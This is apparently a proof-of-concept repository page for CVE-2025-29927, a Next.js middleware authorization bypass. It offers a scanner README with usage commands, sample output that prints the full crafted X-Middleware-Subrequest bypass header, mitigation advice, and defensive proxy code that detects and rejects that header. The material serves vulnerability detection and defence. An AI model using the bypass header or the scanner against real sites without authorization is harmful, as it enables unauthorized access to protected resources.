
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Next.js Middleware Bypass Scanner
Readme
# CVE-2025-29927

## Next.js Middleware Bypass Scanner (CVE-2025-29927)

This repository provides a specialized scanner for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927), which affects Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls enforced in middleware by sending a specially crafted HTTP header.

## About the Vulnerability

The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending an `X-Middleware-Subrequest` header that the framework interprets as marking an internal subrequest, so the middleware (and any authorization check it performs) is skipped. This can lead to unauthorized access to protected resources and routes.

**CVSS Score:** 9.1 (Critical)

## Features

- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing

## Installation

```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt
```

## Usage

```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```

### Command Line Arguments

- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets

### Examples

Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```

Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```

Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```

Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```

Scan with a custom header (`-H`):
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```

## Output

For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation

Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```

## Mitigation

To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level
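The second mitigation step, blocking the header before it reaches Next.js, can also be enforced and logged in a Node.js reverse proxy or custom server sitting in front of the application. The following is an added example written for this page; it is not part of the scanner project or of Next.js. It assumes every request arriving at that layer is external (legitimate internal subrequests never cross the proxy boundary), and it works on any object shaped like Node's `IncomingMessage` (`headers`, `method`, `url`, `socket.remoteAddress`). The sample requests at the bottom are constructed for illustration.

```javascript
// Added example (not from the scanner project or Next.js): edge-side handling of
// the X-Middleware-Subrequest header abused by CVE-2025-29927.
//  1. inspectRequest(): detects the header on an inbound request (header names
//     are case-insensitive; Node lower-cases them, but we normalise anyway) and
//     builds a record suitable for logging or alerting.
//  2. sanitizeHeaders(): returns a copy of the headers with the header removed,
//     for deployments that prefer stripping to rejecting.
//  3. guard(): wraps a request handler and rejects flagged requests with 400.
// Assumption: this runs on a proxy/custom server where all traffic is external.

const BYPASS_HEADER = 'x-middleware-subrequest';

// The vulnerable versions treated the value as a ':'-separated chain of
// middleware module names; we only summarise it for the detection record.
function describeHeaderValue(value) {
  const parts = String(value).split(':').filter(Boolean);
  return {
    entries: parts.length,
    mentionsMiddleware: parts.some((p) => p.includes('middleware')),
  };
}

function inspectRequest(req) {
  const headers = {};
  for (const [name, value] of Object.entries(req.headers || {})) {
    headers[name.toLowerCase()] = value;
  }
  if (!(BYPASS_HEADER in headers)) {
    return { suspicious: false, action: 'allow' };
  }
  const raw = headers[BYPASS_HEADER];
  const value = Array.isArray(raw) ? raw.join(',') : raw;
  return {
    suspicious: true,
    action: 'reject',
    record: {
      rule: 'CVE-2025-29927: x-middleware-subrequest from external client',
      method: req.method,
      url: req.url,
      sourceIp: req.socket && req.socket.remoteAddress,
      header: value,
      ...describeHeaderValue(value),
    },
  };
}

function sanitizeHeaders(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BYPASS_HEADER) clean[name] = value;
  }
  return clean;
}

// Reject before the request reaches Next.js; wire it in on the proxy with
// http.createServer(guard(forwardToNext)).
function guard(next) {
  return (req, res) => {
    const verdict = inspectRequest(req);
    if (verdict.suspicious) {
      console.warn(JSON.stringify(verdict.record)); // ship to SIEM/alerting
      res.writeHead(400, { 'content-type': 'text/plain' });
      res.end('bad request');
      return;
    }
    next(req, res);
  };
}

// Constructed sample requests shaped like Node's IncomingMessage.
const legit = {
  method: 'GET',
  url: '/admin',
  headers: { host: 'example.com', cookie: 'session=abc' },
  socket: { remoteAddress: '203.0.113.5' },
};
const probe = {
  method: 'GET',
  url: '/admin',
  headers: {
    host: 'example.com',
    'x-middleware-subrequest': 'middleware:middleware:middleware',
  },
  socket: { remoteAddress: '203.0.113.9' },
};
```

Rejecting (rather than silently stripping) is the safer default here: an external client has no legitimate reason to send this header, so its presence is itself a detection signal worth recording with the source address, and a 400 makes scanning attempts visible in access logs.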

## Disclaimer

This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.

## License

MIT 
File Snapshot

/data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4
├── CVE-2025-29927.py (7.4K)
├── README.md (3.0K)
└── requirements.txt (60 bytes)
0 directories, 3 files